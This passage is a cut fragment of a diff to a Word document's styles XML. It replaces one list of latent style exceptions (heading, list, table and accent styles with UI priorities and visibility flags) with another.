-    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
-    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="375">
+    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
+    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
+    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
+    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid" w:semiHidden="1" w:uiPriority="59" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
+    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Revision" w:semiHidden="1"/>
+    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
